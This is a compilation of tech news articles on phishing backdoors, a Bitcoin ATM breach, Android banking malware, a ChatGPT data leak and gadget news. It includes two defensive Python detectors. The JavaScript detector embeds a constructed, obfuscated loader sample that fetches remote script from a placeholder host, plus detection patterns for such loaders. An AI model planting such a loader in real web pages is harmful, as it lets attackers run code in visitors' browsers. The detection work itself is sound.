New Backdoor Attack Uses Russian-Ukrainian Conflict Phishing Emails


The primary targets of this phishing campaign are located in the Ukrainian regions of Crimea, Donetsk, and Lugansk, which were annexed by Russia in 2014.

Threat actors have launched a new spear phishing campaign in which they install a PowerShell-based PowerMagic backdoor and CommonMagic framework, according to a report by Kaspersky’s Global Research and Analysis Team.

The attackers send phishing emails containing malicious documents that lead to the installation of the backdoors.

The emails are designed around the Russian-Ukrainian conflict, indicating that the attackers may have a specific interest in the regional geopolitical situation.

[Image: Example of the phishing email (Image credit: Kaspersky)]

Kaspersky researcher Leonid Besverzhenko stated that the campaign is primarily an espionage operation targeting administrative, agricultural, and transportation organizations to steal sensitive data.

The phishing emails contain a URL that directs the victim to a ZIP archive containing a malicious LNK file disguised as a PDF. When the victim launches the file, the PowerMagic backdoor is installed on the network; it communicates with its C2 server through OneDrive and Dropbox folders and then deploys CommonMagic, a previously undiscovered “malicious framework.”

The CommonMagic framework includes separate modules for different tasks, such as encryption/decryption, screenshot capturing, and document stealing. It can also use plugins for stealing a wide range of files, including DOC, DOCX, XLS, XLSX, RTF, ODT, ODS, ZIP, RAR, TXT, and PDF from USB devices.

Additionally, it can take screenshots every three seconds by abusing the Windows Graphics Device Interface (GDI) API. Both pieces of malware have been in active use since September 2021, and Kaspersky discovered the campaign in October.

Researchers have not yet been able to attribute this campaign to a previously known actor, but they believe an advanced threat actor is behind it.
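A defender's triage check for the lure described above, written for this article and not taken from Kaspersky's report: it opens an emailed ZIP and flags members that are Windows shortcuts posing as documents, by name (a double extension such as .pdf.lnk) and by content (the LNK header magic, even when the extension lies). The sample archive is constructed in the code.

```python
"""Triage a ZIP attachment for LNK files posing as documents.

Added example, not Kaspersky's tooling: it flags the lure described above
(a Windows shortcut named like a PDF inside an emailed archive).
"""
import io
import os
import zipfile

# A Windows shell link starts with HeaderSize 0x4C and the LinkCLSID
# {00021401-0000-0000-C000-000000000046}, serialised little-endian.
LNK_MAGIC = bytes.fromhex("4C000000" "0114020000000000C000000000000046")
# Document extensions an attacker would place in front of ".lnk"
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".odt", ".txt"}


def triage_member(name: str, head: bytes) -> list:
    """Return the reasons an archive member looks like a disguised LNK, or []."""
    reasons = []
    root, ext = os.path.splitext(os.path.basename(name))
    ext = ext.lower()
    inner_ext = os.path.splitext(root)[1].lower()
    is_lnk = head.startswith(LNK_MAGIC)
    if is_lnk:
        reasons.append("Windows shell link (LNK) header")
    if ext == ".lnk" and inner_ext in DOC_EXTS:
        reasons.append(f"double extension {inner_ext}{ext}")
    if is_lnk and ext != ".lnk":
        reasons.append(f"LNK header under non-LNK extension {ext or '(none)'}")
    return reasons


def triage_zip(data: bytes) -> dict:
    """Map each suspicious member name to its reasons; clean archives give {}."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_MAGIC))  # only the header is needed
            reasons = triage_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample() -> bytes:
    """Constructed sample archive: a benign PDF and a shortcut posing as one."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4\n% constructed benign sample\n")
        zf.writestr("report.pdf.lnk", LNK_MAGIC + b"\x00" * 60)  # fake LNK body
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in triage_zip(build_sample()).items():
        print(member, "->", "; ".join(why))
```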


Zero-day spells disaster for Bitcoin ATM


We look at a $1.5m heist of cryptocurrency via compromised Bitcoin ATMs.

Bitcoin ATMs have experienced a severe bout of cash drain after a zero-day bug was exploited to steal a total of $1.5 million in digital currency. The ATMs, located in various convenience stores, function along the lines of regular banking ATMs except your dealings are all in the cryptocurrency realm.

As Ars Technica notes, a particular feature of the affected ATMs is the ability to upload video. It’s not mentioned what these videos are used for (presumably security cameras), but the master server interface allowing for the video uploads is where things went horribly wrong.

From the General Bytes statement regarding the March 18 incident:

The GENERAL BYTES Cloud service and other standalone servers run by operators suffered security breaches. We noticed the first signs of a break-in on Friday night, right after midnight on Saturday, 18 March (UTC+1). We notified customers to shut down their CAS servers as soon as possible. The attacker could upload his java application remotely via the master service interface used by terminals to upload videos and run it using BATM user privileges. As a result, the attacker could send funds from hot wallets, and at least 56 Bitcoins were stolen before we could release the patch. The patch was released within 15 hours.

To make use of the exploit, the attacker uploaded a custom made application to the ATM application server used by the administration interface. In a nod to the evergreen security tip “Don’t allow things to autorun if you don’t need them to”, the application server allowed applications to start by default.

With this in place, the attacker was able to perform the below:

  • Ability to access the database.
  • Ability to read and decrypt API keys to access funds in hot wallets and exchanges.
  • Send funds from hot wallets.
  • Download user names and their password hashes, and turn off 2FA.
  • Ability to access terminal event logs, which can include private keys at the ATM.

56 bitcoins are currently worth a cool $1.5 million. It is very unlikely all of the stolen coins belonged to one person, but this is scant consolation for anyone affected. For now, General Bytes is collecting information on everyone affected to “validate losses”. It remains to be seen if anyone is able to recover their funds, but losing money in any cryptocurrency scenario is always a very risky business because cryptocurrencies are generally, by design, unable to roll back fraudulent transactions.

Interestingly, the affected company has put out a call to any security companies and individuals who feel they can assist in making the product safer.

Keeping your hot wallet safe

Your cryptocurrency wallet type is an article all to its own, but in most cases you’re going to have a wallet which is hot or cold. A cold wallet is not connected to the Internet and is therefore the safest possible choice. A hot wallet comes with some form of connectivity built in, which is much more convenient. You’re able to send funds, for example, and engage with cryptocurrency exchanges. In this case, the compromised wallets are considered to be hot. Without this functionality, the ATM would be rather useless for the user’s needs.

You can’t prepare for every eventuality. If an exchange (or, in this case, a connected ATM) is compromised then your funds could still vanish no matter what security plans you have in place. Even so, here’s what you can do from your end to keep things secure.

  • Enable two-factor authentication. If it’s available for your flavour of wallet, then make sure to turn it on. Hardware keys are safest, then authenticator apps, and lastly SMS.
  • Keep your recovery passphrase safe. Never hand over your recovery phrase to any site or individual; this is a common scam deployed by phishers.
  • Be sceptical of airdrops. This is another way to entice potential victims with phishing tactics. As per the above, asking for your recovery phrase is the ultimate aim.


USB bombs sent to news organizations


USB sticks repurposed as explosive devices provide a dramatic reminder of how little you know about unknown USB devices.

We’ve warned about the possible dangers arising from plugging in unknown USB sticks before, but the dangers we’re concerned with are normally confined to your data.

However, this week we learned of a far more serious threat. No fewer than five different news agencies in Ecuador were sent parcels containing a USB stick. In the one instance where a stick was plugged into a PC by a journalist, the device exploded, injuring a presenter in the newsroom. At least one of the devices had been loaded with a “military type explosive”.

Law enforcement is currently investigating, but for now we have to hope that no additional devices were sent out, just waiting to be inserted into a PC. While this scenario is almost guaranteed to be one that you will not face, that doesn’t mean there aren’t USB stick related perils out there in the wild.

A sticky malware threat

Malware authors are big fans of sending out infected USB sticks to potential victims. Just last year, slick looking Microsoft boxes supposedly containing Office 365 loaded onto USB sticks were sent out by tech support scammers. When inserted into a PC, a phone number would appear and callers would find themselves asked to install remote access tools on their devices. Elsewhere, infected USB Sticks came bearing the gift of ransomware.

USB sticks are also easy to lose: sometimes people find them lying around in the street, full of potentially sensitive data rather than some kind of horrible malware.

Our willingness to insert sticks into computers is helped along by USB sticks being a commonplace giveaway at events and conferences, and even a staple of certain performance art pieces. If you have children, your school may well hand out digital copies of school photographs on USB sticks. Many people will insert those sticks into their computer without a second thought because they come from a trusted source, the school. Yet the stick is actually from a totally unrelated third-party photographer. Can we guarantee that the photographer is following safety rules, if they even exist?

We never really know for sure, and that can be a problem. However, there are a few things you can do to help keep yourself safe from USB harm.

Tips for USB security

  • Don’t autorun files. If Autorun is enabled on your device, it’s time to consider turning it off.
  • Restrict access. If people in your workplace don’t need to use USB sticks, turn off USB access on their devices and block the USB ports.
  • Occasional access. For times when someone needs to use a USB stick, consider using those sticks on a non-networked PC running a virtual machine.
  • Fire up those security tools. Always scan the contents of a USB stick. Your Endpoint Detection and Response should be equipped to deal with USB threats.


Fans of third-party YouTube apps should watch out for Nexus banking malware


Nexus first appeared in June last year and is now being openly advertised by its creators on hacker forums to increase its reach. Nexus’ primary targets are 450 banking and cryptocurrency apps.

It’s being distributed through phishing websites posing as legitimate websites of YouTube Vanced, a discontinued third-party YouTube app. It uses every trick in the book to gain your banking info and take over your financial accounts.

Nexus asks for 50 permissions and abuses at least 14 of them

It is capable of performing overlay attacks, i.e. replicating a legitimate interface to trick you into entering your credentials, and uses keylogging to record your keystrokes. It can even steal SMS messages to get access to two-factor authentication codes and can abuse Accessibility Services to steal information from crypto wallets, 2-Step Verification codes generated by Google Authenticator, and website cookies. The trojan can also delete messages received by you.

After it’s installed on a device, Nexus connects to its command-and-control (C2) server. C2s are used by cybercriminals to control malware, launch attacks, and receive stolen data.

Nexus is said to be in the beta stage but it’s already being used by many threat actors to carry out nefarious activities. Cybercriminals who do not know how to make their own malware can rent it for $3,000 a month.

It looks like the developer is from a CIS (Commonwealth of Independent States) country and has prohibited the trojan’s use in Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russian Federation, Tajikistan, Uzbekistan, Ukraine, and Indonesia.

Nexus is capable of updating itself and Cleafy thinks it is a real threat and can infect hundreds of Android devices in the world.

To protect yourself from infections, try to only download apps from Google Play and enable Google Play Protect. Use strong passwords and enable biometric security features where possible and be very careful when granting permissions.



ChatGPT leaks bits of users’ chat history


ChatGPT suddenly started showing users the titles of other users’ chats.

New gadgets and software come with new bugs, especially if they’re rushed. We can see this very clearly in the race between tech giants to push large language models (LLMs) like ChatGPT and its competitors out the door. In the most recently revealed LLM bug, ChatGPT allowed some users to see the titles of other users’ conversations.

LLMs are huge deep neural networks, trained on the input of billions of pages of written material.

In the words of ChatGPT itself:

“The training process involves exposing the model to vast amounts of text data, such as books, articles, and websites. During training, the model adjusts its internal parameters to minimize the difference between the text it generates and the text in the training data. This allows the model to learn patterns and relationships in language, and to generate new text that is similar in style and content to the text it was trained on.”

We have written before about tricking LLMs into behaving in ways they aren’t supposed to. We call that jailbreaking. And I’d say that’s fine. It’s all part of what could be seen as a beta-testing phase for these complex new tools. And as long as we report the ways in which we are able to exceed the limitations of the model and give the developers a chance to tighten things up, we’re working together to make the models better.

But, when a model spills information about other users we stumble into an area that should have been sealed off already.

To understand better what has happened, it is necessary to have some basic working knowledge about how these models work. To improve the quality of the responses they get, users can organize the conversations they have with the LLM into a type of thread, so that the model, and the user, can look back and see what ground they have covered and what they are working on.

With ChatGPT, each conversation with the chatbot is stored in the user’s chat history bar where it can be revisited later. This gives the user an opportunity to work on several subjects and keep them organized and separate.

[Image: The history was unavailable for a while]

Showing this history to other users would, at the very least, be annoying and unacceptable, because it could be embarrassing or even give away sensitive information.

[Image: Did I ask ChatGPT what to get my wife for Valentine’s Day?]

Nevertheless, this is exactly what happened. At some point, users started noticing items in their history that weren’t their own.

Although OpenAI reassured users that others could not access the actual chats, users were understandably worried about their privacy.

According to an OpenAI spokesperson on Reddit the underlying bug was in an open source library.

[Image: post on Reddit by Sam Altman]

OpenAI CEO Sam Altman said the company feels “awful”, but the “significant” error has now been fixed.

Things to remember

Giant, interactive LLMs like ChatGPT are still in the early stages of development and, despite what some want us to believe, they are neither the answer to everything nor the end of the world. At this point they are just very limited search engines that rephrase what they found about the subject you asked about, unlike an “old-fashioned” search engine that shows you possible sources of information and you can decide which ones are trustworthy and which ones aren’t.

When you are using any of the LLMs, remind yourself that they are still very much in a testing phase. Which means:

  • Do not feed it private or sensitive information about yourself or your employer. Other leaks are likely and may be even more embarrassing.
  • Take the results with more than just a grain of salt. Because the models don’t provide sources of information, you can’t know where its ideas came from.
  • Make yourself familiar with the LLM’s limitations. It helps to understand how up to date the information it uses is and the subjects it can’t converse freely about.


Hackers Inject Weaponized JavaScript (JS) on 51,000 Websites


Researchers from Unit 42 have been monitoring a widespread campaign of harmful JavaScript (JS) injections. The campaign aims to redirect unsuspecting victims to dangerous content, including adware and fraudulent pages.

Websites continue to be infected by this threat in 2023, as it was active throughout 2022. The malicious JS code was discovered on over 51,000 websites, with several hundred appearing in Tranco’s top 1 million ranked websites.

The potential impact of this campaign is significant, as the presence of affected websites in Tranco suggests a widespread reach.

The campaign’s complexity lies in its multi-stage injection process, which precedes the redirect to harmful web pages; as additional means of evading detection, obfuscation and benign append attacks were employed.

Impact of the campaign on users

Experts have identified multiple versions of a campaign in which threat actors inject malicious JS code into websites. The campaign was first observed in 2020.

170,000 URLs and 51,000 hostnames have been identified as part of this campaign since its inception in 2022.

A peak of over 4,000 daily URLs was generated as a result of this campaign between May and August 2022.

The impact of this campaign has been substantial, with hundreds of infected websites appearing in Tranco’s top one million ranked sites, indicating a potentially wide reach among internet users.

In January 2023, approximately 240,000 website sessions were prevented across 14,773 devices due to blocking measures taken against these websites.

Technical analysis

A malicious payload was hidden in the injected JS code, which was obfuscated to evade detection. The obfuscated code conceals the URL from which a further malicious JS file is loaded.

The injected code then adds that external malicious JS to the page’s DOM dynamically.

On certain websites, the obfuscated JS snippets were found injected into commonly used utility JS files. Appending malicious code to long stretches of benign code, known as a benign append attack, is a common tactic malware authors employ.

It helps the injection evade detection by security crawlers. In each JS snippet, the injected code appends the external malicious JS through DOM manipulation.

Because the payload is fetched from an external URL, the attacker can change it at will, which provides greater flexibility. In its more recent version, the campaign injects the malicious JS code into the website itself.

Upon executing the final payload, users are redirected to various websites before reaching a destination webpage, often consisting of adware or a fraudulent page.

This page displays false information that may deceive individuals into granting permission for a malicious website to send browser notifications under the control of an attacker.

The researchers at Unit 42 believe that many websites are susceptible to security breaches due to vulnerabilities in one or more CMS plugins.

The researchers at Sucuri have discovered that exactly the same technique was used to exploit CMS plugins in a similar campaign. The threat actors responsible for creating malware have produced multiple variations of the harmful JavaScript code they injected into websites during this campaign.

Detecting different variants of the same attack is a robust characteristic of deep learning techniques often used to detect intrusions.

In order to prevent malicious JS injections, deep learning techniques could be applied to increase the detection rate.
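A simple heuristic detector for the injection pattern described above, added here and not part of Unit 42’s research: it inspects the last few lines of a JavaScript file, where an appended loader would sit, and flags a script element whose src is built from an obfuscated string and then appended to the DOM. The benign utility file and the injected tail are constructed for the example, and the host name in the tail is a placeholder.

```python
"""Flag JS files that end with an appended, obfuscated script loader.

Added example, not Unit 42's tooling. Requiring an obfuscation marker
keeps ordinary analytics loaders, which also append a <script>, from
being reported.
"""
import re

# Markers of the loader described in the article: it creates a <script>,
# builds the src at run time rather than writing it plainly, and appends it.
INDICATORS = {
    "creates script element": re.compile(r"createElement\s*\(\s*[\"']script[\"']\s*\)"),
    "src assignment": re.compile(r"\.src\s*="),
    "dom append": re.compile(r"\.(appendChild|insertBefore|append)\s*\("),
    "charcode decoding": re.compile(r"String\.fromCharCode\s*\("),
    "hex-escaped string": re.compile(r"(\\x[0-9a-fA-F]{2}){8,}"),
    "base64 decode": re.compile(r"\batob\s*\("),
}
LOADER = {"creates script element", "src assignment", "dom append"}
OBFUSCATION = {"charcode decoding", "hex-escaped string", "base64 decode"}


def analyze(js: str, tail_lines: int = 5) -> dict:
    """Score the last few lines of a JS file, where an appended loader would sit."""
    lines = js.splitlines()
    body = "\n".join(lines[:-tail_lines])
    tail = "\n".join(lines[-tail_lines:])
    tail_hits = {name for name, rx in INDICATORS.items() if rx.search(tail)}
    body_hits = {name for name, rx in INDICATORS.items() if rx.search(body)}
    injected = LOADER <= tail_hits and bool(tail_hits & OBFUSCATION)
    return {
        "tail_indicators": sorted(tail_hits),
        "injected_loader": injected,
        # benign append: the loader sits after code showing none of its markers
        "benign_append": injected and not (body_hits & tail_hits),
    }


# Constructed stand-in for a site's utility library.
BENIGN_UTILITY = "\n".join([
    "// constructed benign utility code",
    "function debounce(fn, ms) {",
    "  let t;",
    "  return function () { clearTimeout(t); t = setTimeout(fn, ms); };",
    "}",
    "function qs(sel) { return document.querySelector(sel); }",
])

# Constructed loader modelled on the behaviour described in the article;
# the decoded host is the placeholder example.invalid, not a real indicator.
INJECTED_TAIL = (
    "var _0x=String.fromCharCode(104,116,116,112,115,58,47,47);"
    "var s=document.createElement('script');"
    r"s.src=_0x+'\x65\x78\x61\x6d\x70\x6c\x65\x2e\x69\x6e\x76\x61\x6c\x69\x64/l.js';"
    "document.head.appendChild(s);"
)

if __name__ == "__main__":
    print("clean file:", analyze(BENIGN_UTILITY))
    print("appended file:", analyze(BENIGN_UTILITY + "\n" + INJECTED_TAIL))
```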


Global versions of Huawei Mate X3 & P60 will launch on May 9


As many of you know by now, Huawei announced its new flagship offerings yesterday. The Huawei Mate X3 foldable smartphone got announced, alongside three Huawei P60 series devices, and the Huawei Watch Ultimate. Some other devices got presented, but these are the ones that stole the show. Well, Huawei has confirmed that global variants of the Mate X3 and P60 series will be coming on May 9.

Global versions of Huawei Mate X3 & P60 series will launch on May 9

Do note that the company reached out to us to confirm it, we haven’t seen it on Huawei’s social media network channels just yet. The company said that the event will take place in Munich, Germany, though we still don’t know at what time exactly. That confirmation will likely come later on.

Just to be clear, the company said that “overseas versions” of “a number of new products” that launched in China, will be announced during this event. It did not name devices specifically, so do note that.

The Huawei Watch Ultimate was already announced for global markets, at the same time as the event in China yesterday. We already know it will go on sale on March 28, and that it will be quite pricey.

The Huawei Mate X3 has a lot to offer from the design standpoint

More people are probably interested in Huawei’s flagship smartphones, though. The Huawei Mate X3 managed to shock us yesterday, as it was announced as the thinnest book-style foldable, and also one of the lightest large foldables in the market. Well, probably the lightest one.

That’s only scratching the surface, though, as the phone truly does have a lot to offer. The Huawei P60 series is also rather interesting. Huawei opted for a somewhat odd naming scheme these days, by introducing the ‘Art’ model as the highest-end P60 device.

It remains to be seen if all three P60 devices will launch in Europe, or just one or two. The Mate X3 will be coming, almost certainly, so get ready for that.



Twitter is removing legacy blue checkmarks as Twitter Blue goes global


Twitter made two big announcements today. Firstly, its premium subscription service Twitter Blue is now available globally. Anyone can pay the company to unlock some extra features and add a blue tick next to their handle. Second, the social network is removing legacy verified checkmarks starting on April 1. Accounts that were verified before Elon Musk took over the company will lose their blue checkmarks unless they subscribe to Twitter Blue.

Both of these changes have been a long time coming. By a long time, we mean since Twitter changed ownership in late October 2022. Elon Musk made it clear that the company would scrap the existing account verification system and would instead sell the blue tick as part of Twitter Blue, which he sees as a big revenue stream. “The way in which they were given out was corrupt and nonsensical,” the billionaire said about the legacy checkmarks in December. He repeated the “corrupt” remark last month too.

The first part of the plan was to make Twitter Blue available for everyone before removing the legacy blue ticks. The firm has rapidly expanded the subscription system in recent months, finally bringing it to Android in January this year. Today, the service has gone global. “Twitter Blue is now available globally! Sign up today to get your blue checkmark, prioritized ranking in conversations, half ads, long Tweets, Bookmark Folders, custom navigation, Edit Tweet, Undo Tweet, and more,” Twitter Blue tweeted Thursday afternoon.

Twitter will start removing legacy blue checkmarks on April Fool’s Day

With the subscription service available globally, Twitter has announced the second part of the plan as well. Starting this April Fool’s Day, it will no longer honor the coveted checkmark that users earned after meeting several criteria established by the company. Instead, it is forcing them to buy a Twitter Blue subscription to keep the blue tick. “On April 1st, we will begin winding down our legacy verified program and removing legacy verified checkmarks. To keep your blue checkmark on Twitter, individuals can sign up for Twitter Blue,” Twitter Verified tweeted just hours later.

Twitter Blue costs $8 a month ($11 a month if you subscribe through the Android or iOS app). It gives you everything that the company mentioned in the tweet above. You need to verify your identity with a phone number for the blue tick, though. For governmental and organizational accounts, Twitter has introduced a new grey checkmark. Heads of state, ministers, national-level cabinet members, official spokespersons, company headquarters, regional and country-level institutional accounts, and multilateral individuals are among those eligible for grey checkmarks.



OnePlus will launch two new ‘Nord’ devices on April 4


OnePlus has confirmed that it will launch two new ‘Nord’ devices on April 4. We already know what products, actually. OnePlus is to blame for that, as it already kind of listed both of them on its website.

OnePlus is planning to launch two ‘Nord’ devices on April 4

The devices in question are the OnePlus Nord CE 3 Lite and the OnePlus Buds 2. OnePlus has already published pictures of both of those devices on its website. The company, however, did not share any other details. We knew about the CE 3 Lite since earlier this month, but the Buds 2 were not confirmed, until now.

These will launch in India, at least at first. They will also be quite affordable, these are ‘Nord’ devices after all. The OnePlus Nord CE 3 Lite will be available in a Pastel Lime color, while the earbuds will sell in Black and White colors. You can check out both devices in the gallery below.

The phone will have two camera islands on the back, hosting three cameras, it would seem. The OnePlus Buds 2, on the other hand, will look basically like the first-gen model. We do expect some improvements on the inside, though, of course.

The phone will include a 120Hz display, 67W charging & a 108MP camera

The company did not share any spec info regarding these products, but the OnePlus Nord CE 3 Lite specs did surface recently. The device will feature a 6.7-inch fullHD+ LCD display, it seems. It will feature a 120Hz refresh rate, by the way.

A 5,000mAh battery was also mentioned, and 67W fast wired charging will be supported. The Snapdragon 695 will fuel the device, while you’ll be able to choose between 6GB and 8GB RAM flavors. Those two models will ship with 128GB and 256GB of internal storage, respectively. Also, the storage will be expandable.

A 108-megapixel main camera will sit on the back. It will be backed by two 2-megapixel units. We still don’t have the details on those. A single 16-megapixel camera will sit on the front.

Android 13 will come pre-installed on the phone, along with OxygenOS 13. You can also expect two SIM card slots to be available. We don’t have the OnePlus Buds 2 details yet.



The iRobot Roomba i4+ is on sale for a limited time!


Today, Amazon has the iRobot Roomba i4+ on sale for $399. That’s going to save you $250 off of the regular price. That is also the cheapest the Roomba i4+ has ever been, making this a really great time to pick one up.

That’s a pretty solid price for the Roomba i4+. iRobot claims that the Roomba i4+ is perfect for those that have pets. That’s because it does not use a single bristle brush. Instead it uses the multi-surface rubber brushes that are able to flex to adjust to different floor types. So why is this good for pets? It doesn’t get pet hair tangled in the brush, which is a really big deal honestly.

Other than that, the Roomba i4+ also has all of the features that you’d expect from iRobot. That includes voice commands with Google Assistant and Alexa. There’s also schedules available, so you can have your Roomba clean at specific times, on specific days. iRobot claims that it has about 10x the power-lifting suction power when compared to the Roomba 600 series.

This is the plus model, which means that it also comes with the auto-empty dock. So when the iRobot Roomba i4+ docks, it will go ahead and empty the dustbin. Which is very convenient and it can also hold about 60 days worth of debris before it needs to be emptied.

Whether you’re relaxing at home or out enjoying life, the Roomba i4 plus EVO robot vacuum takes care of stubborn dirt and messes with a Premium 3-Stage Cleaning System and 10x the Power-Lifting Suction compared to the Roomba 600 series cleaning system. The Roomba i4 plus EVO takes vacuuming off your mind with personalized cleaning suggestions powered by the unique intelligence of iRobot OS. It learns your habits and your routines.

You can pick up the iRobot Roomba i4+ robot vacuum from Amazon today by clicking here.

iRobot Roomba i4+ – Amazon

